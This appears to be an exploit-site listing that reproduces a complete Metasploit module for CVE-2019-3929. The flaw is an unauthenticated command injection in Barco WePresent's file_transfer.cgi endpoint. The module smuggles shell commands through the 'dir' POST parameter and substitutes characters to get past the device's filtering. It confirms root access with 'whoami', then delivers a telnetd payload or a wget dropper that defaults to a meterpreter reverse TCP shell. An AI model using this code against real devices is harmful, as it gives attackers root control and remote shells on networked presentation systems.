Exploit for Barco WePresent file_transfer.cgi Command Injection CVE-2019-3929

Name: Exploit for Barco WePresent file_transfer.cgi Command Injection CVE-2019-3929
Rating: 5 (87 reviews)
2020-01-14 | CVSS 10.0
## https://sploitus.com/exploit?id=PACKETSTORM:155948
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => "Barco WePresent file_transfer.cgi Command Injection",  
'Description' => %q(  
This module exploits an unauthenticated remote command injection  
vulnerability found in Barco WePresent and related OEM'ed products.  
The vulnerability is triggered via an HTTP POST request to the  
file_transfer.cgi endpoint.  
),  
'License' => MSF_LICENSE,  
'Author' => 'Jacob Baines', # @Junior_Baines'  
'References' =>  
[  
['CVE', '2019-3929'],  
['EDB', '46786'],  
['URL', 'https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c']  
],  
'DisclosureDate' => "Apr 30, 2019",  
'Platform' => ['unix', 'linux'],  
'Arch' => [ARCH_CMD, ARCH_ARMLE],  
'Privileged' => false,  
'Targets' => [  
['Unix In-Memory',  
'Platform' => 'unix',  
'Arch' => ARCH_CMD,  
'Type' => :unix_memory,  
'Payload' => {  
'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnetd' }  
}],  
['Linux Dropper',  
'Platform' => 'linux',  
'Arch' => ARCH_ARMLE,  
'CmdStagerFlavor' => ['printf', 'wget'],  
'Type' => :linux_dropper]  
],  
'DefaultTarget' => 1,  
'DefaultOptions' => {  
'SSL' => true,  
'RPORT' => 443,  
'CMDSTAGER::FLAVOR' => 'printf',  
'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'  
}))  
end  
  
def filter_bad_chars(cmd)  
cmd.gsub!(/;/, 'Pa_Note')  
cmd.gsub!(/\+/, 'Pa_Add')  
cmd.gsub!(/&/, 'Pa_Amp')  
return cmd  
end  
  
def send_command(cmd, timeout)  
vars_post = {  
file_transfer: 'new',  
dir: "'#{filter_bad_chars(cmd)}'"  
}  
  
send_request_cgi({  
'uri' => '/cgi-bin/file_transfer.cgi',  
'method' => 'POST',  
'vars_post' => vars_post  
}, timeout)  
end  
  
def check  
check_resp = send_command(";whoami;", 5)  
unless check_resp  
return CheckCode::Unknown('Connection failed.')  
end  
  
if check_resp.code == 200  
check_resp.body.gsub!(/[\r\n]/, "")  
if check_resp.body == "root"  
return CheckCode::Vulnerable  
end  
end  
  
CheckCode::Safe  
end  
  
def execute_command(cmd, _opts = {})  
send_command(";(#{cmd})&", nil)  
end  
  
def exploit  
case target['Type']  
when :unix_memory  
execute_command(payload.encoded)  
when :linux_dropper  
execute_cmdstager(linemax: 128)  
end  
end  
end